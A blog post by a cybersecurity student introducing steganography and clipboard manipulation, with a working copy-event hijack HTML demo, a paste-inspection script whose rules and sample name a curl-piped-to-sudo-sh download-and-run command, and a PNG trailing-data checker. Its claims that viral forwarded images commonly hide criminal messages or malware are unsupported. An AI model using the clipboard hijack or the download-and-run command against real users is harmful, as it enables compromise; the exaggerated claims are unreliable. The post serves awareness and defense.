Steganography and its looming threats

SwayamInduShashi
Oct 19, 2024

If you search for “Steganography” on Wikipedia, you’ll get the bookish definition: “Steganography (/ˌstɛɡəˈnɒɡrəfi/ STEG-ə-NOG-rə-fee) is the practice of representing information within another message or physical object, in such a manner that the presence of the concealed information would not be evident to an unsuspecting person’s examination. In computing/electronic contexts, a computer file, message, image, or video is concealed within another file, message, image, or video.”

In simple words: “hiding in plain sight”.

So why do we need to learn about such a complicated and ‘foreign’ word? Because this simple thing can legit create havoc and catastrophe, both in personal lives and in societies. Let’s delve deeper.

Image Steganography

Before starting: have you received those annoying WhatsApp and Facebook messages? Like ‘Good Morning’, ‘If you don’t forward it you will fail’, rumours, or those annoying religious posts where if you don’t circulate the image you will be cursed?

Have you wondered why those are created? Are they bots? Well, actually no. They have hidden messages or malicious code hidden inside them. Go to the website:

Try it for yourself to encode and decode a code into a picture. It could be your new “War Game”.

Here’s an explanation of how it is used (you can skip to the next section if this bores you, but it will clarify the context further).

When ‘Bad People’ want to communicate with each other, they can’t interact directly, otherwise the communication could be intercepted and lead to an arrest. So they create a very controversial image (a religious post or a rumour, things that spread easily) and embed their messages, codes or plans in it. The image then reaches the target indirectly, as people forward it to each other. The receiver decodes the received image with their own de-steganographer and then a decoder. So, next time you receive any such message, don’t panic; try to break the chain. If you wanna feel like a detective, try to decode it using online tools and logic.

Clipboard Manipulation

Before explaining this concept, let’s start with an experiment. Open Notepad, paste the code below and save it as <file_name>.html

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Clipboard Manipulation</title>
    <script>
        function interceptCopy(event) {
            event.preventDefault(); // Prevent default copy action
            const textToCopy = "You've been pwned"; // Text2
            event.clipboardData.setData('text/plain', textToCopy); // Override clipboard data
        }
    </script>
</head>
<body>
    <p id="text1">
        Cut, copy, and paste are essential commands of modern human–computer interaction and user interface design.
        They offer an interprocess communication technique for transferring data through a computer's user interface.
        The cut command removes the selected data from its original position, and the copy command creates a duplicate;
        in both cases, the selected data is kept in temporary storage called the clipboard.
        Clipboard data is later inserted wherever a paste command is issued. The data remains available to any application
        supporting the feature, thus allowing easy data transfer between applications.
    </p>
    <script>
        // Attach the copy event to the document
        document.addEventListener('copy', interceptCopy);
    </script>
</body>
</html>

Open the HTML page in your fav browser. Try to copy the text and paste it somewhere else.

Did you notice something? Try it again. What!!!

You are copying one thing but something else gets pasted!!! What is this?

This is called clipboard manipulation. Let’s delve deeper into this topic. Suppose you hit a problem on your OS. You search for it online, and after several hits and misses you come across a very shady website which guarantees to solve the problem. The writer suggests some code and asks you to paste it into your terminal/PowerShell and run it with sudo/Administrator privileges, and you run it. BOOM!!! Your system gets compromised: it gets infected with a virus or, even worse, a REVERSE SHELL!!!!

Try to stick to legit websites only, or if you are desperate, use VirusTotal or simply paste the code somewhere else first and check it.
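Here is what “paste it somewhere else and check it” can look like in code. This is an added example, not part of the original experiment: the function name `inspectPaste`, the rule names and the sample strings are all made up for illustration. It compares the text you selected with what actually landed on the clipboard and flags traits that make a pasted command risky.

```javascript
// Added example, not from the original post. In a browser the two inputs would
// come from window.getSelection().toString() and navigator.clipboard.readText();
// here they are plain strings so the check also runs under Node.
const collapse = (s) => s.replace(/\s+/g, " ").trim();

// Hypothetical rule set: each rule returns true when the clipboard text looks risky.
const RULES = {
  // What you selected is not what was placed on the clipboard.
  "mismatch": (sel, clip) => collapse(sel) !== collapse(clip),
  // A line break lets many terminals run the command the moment it is pasted.
  "line-break": (sel, clip) => /[\r\n]/.test(clip),
  // Control, zero-width and bidi-override characters hide or reorder text.
  "hidden-chars": (sel, clip) =>
    /[\u0000-\u0008\u000b\u000c\u000e-\u001f\u007f\u200b-\u200f\u202a-\u202e\u2060\ufeff]/.test(clip),
  // The command asks for root.
  "elevated": (sel, clip) => /\bsudo\b/i.test(clip),
  // Downloads a script and feeds it straight to an interpreter.
  "download-and-run": (sel, clip) =>
    /\b(curl|wget)\b[^\n|]*\|\s*(sudo\s+)?(ba|z)?sh\b/i.test(clip) ||
    /\b(iex|Invoke-Expression)\b/i.test(clip),
};

// Returns the names of every rule that fired, in the order declared above.
function inspectPaste(selectedText, clipboardText) {
  return Object.keys(RULES).filter((id) => RULES[id](selectedText, clipboardText));
}

// Constructed sample 1: the demo page above swaps the paragraph for its own text.
const demoPage = inspectPaste(
  "Cut, copy, and paste are essential commands",
  "You've been pwned"
);

// Constructed sample 2: a "fix" that looks harmless on screen but copies
// something else (example.invalid is a reserved, non-resolving name).
const shadyFix = inspectPaste(
  "sudo apt-get install -f",
  "curl -s http://example.invalid/fix.sh | sudo sh\n"
);

console.log(demoPage);
console.log(shadyFix);
```

An empty result only means none of these rules fired; you still have to read the command before running it.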

Text Steganography

This one is a bit tough to spot, and it turns out to be a false positive in 60% of cases, but that’s what gives it that particular edge. For example:

Papa watered tin plane shed !!!

The above text doesn’t seem that suspicious, but if you focus on the bold letters and arrange them you will get “Pwned”!!

Next time you find a weird text with haphazard editing, some weird cryptic meaning or some elementary grammatical error, don’t ignore it; again, try to break the chain and report it.

Video Steganography

Okay, this is a bit confusing: there are actually two types of video steganography. In the first, a video is embedded into an image or another file; in the second, frames chosen in a particular pattern have the message encoded into them.

For the first one, visit https://github.com/anilsathyan7/Deep-Video-Steganography-Hiding-Videos-in-Plain-Sight/blob/master/README.md

The second type is a bit complicated; it probably can’t be done with online tools and requires your own algorithms.

Try to look at the size of images before forwarding them. Generally images have sizes in KB unless they are edited or from an iPhone… you get it, right? Imagine a picture which looks like it is from the 2000s and has a resolution of 144p, but its size is 40 MB… Yikes!!! Doesn’t look spooky at all.
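The size-versus-resolution check above can be automated. The following is an added example, not from the original post, and it covers PNG files only: it reads the width and height from the IHDR chunk, counts any bytes sitting after the IEND chunk, and flags files far larger than their pixels could need. The names `inspectPng` and `makePng` and the 64 KiB `SLACK` allowance are assumptions made for this sketch.

```javascript
// Added example, not from the original post. Heuristic only: metadata chunks
// can legitimately enlarge a PNG, and chunk CRCs are not verified here.
const PNG_SIG = [0x89, 0x50, 0x4e, 0x47, 0x0d, 0x0a, 0x1a, 0x0a];
const SLACK = 64 * 1024; // assumed allowance for headers and metadata

function inspectPng(bytes) {
  if (!PNG_SIG.every((b, i) => bytes[i] === b)) throw new Error("not a PNG");
  const view = new DataView(bytes.buffer, bytes.byteOffset, bytes.byteLength);
  let off = 8, width = 0, height = 0, end = -1;
  while (off + 12 <= bytes.length) {
    const len = view.getUint32(off); // big-endian length of the chunk data
    const type = String.fromCharCode(...bytes.subarray(off + 4, off + 8));
    if (type === "IHDR" && off + 16 <= bytes.length) {
      width = view.getUint32(off + 8);
      height = view.getUint32(off + 12);
    }
    off += 12 + len; // length field + type + data + CRC
    if (type === "IEND") { end = off; break; }
  }
  if (end < 0 || end > bytes.length || !width || !height) {
    throw new Error("truncated or malformed PNG");
  }
  // Largest possible raw image: 16-bit RGBA (8 bytes/pixel) plus one filter byte per row.
  const maxPixelBytes = height * (width * 8 + 1);
  const trailingBytes = bytes.length - end; // anything after IEND is not image data
  const oversized = bytes.length > maxPixelBytes + SLACK;
  return { width, height, trailingBytes, oversized };
}

// Constructed sample: a header-only PNG (IHDR + IEND, zeroed CRCs, no pixel
// data) followed by extraBytes of zero padding standing in for appended data.
function makePng(width, height, extraBytes) {
  const out = new Uint8Array(45 + extraBytes);
  const v = new DataView(out.buffer);
  out.set(PNG_SIG, 0);
  v.setUint32(8, 13);                      // IHDR data length
  out.set([0x49, 0x48, 0x44, 0x52], 12);   // "IHDR"
  v.setUint32(16, width);
  v.setUint32(20, height);
  out.set([0x49, 0x45, 0x4e, 0x44], 37);   // "IEND" (length field stays 0)
  return out;
}

console.log(inspectPng(makePng(256, 144, 0)));
console.log(inspectPng(makePng(256, 144, 400000)));
```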

Audio Steganography

Have you ever received some distorted audio, like someone had put a monster magnet on an HDD, and ignored it? Well, look back and listen again: it might be a SECRET MESSAGE that you accidentally intercepted, or you were an unknowing medium of a transfer. Try the link below yourself.

Conclusion

Let me tell you a not-so-secret secret: PRIVACY IS A MYTH. In this complicated, interwoven world nobody is completely safe; anyone could be compromised at any time, the opportunity just awaits.

So don’t be naïve: block unknown senders on all of your social media, and if you receive such media, break the chain and report it to the authorities immediately.

Stay safe, keep safe.

SwayamInduShashi

I'm a cyber-security enthusiast, student and a hands-on experimenter. I'm going to try to test and learn something new and will be documenting my process.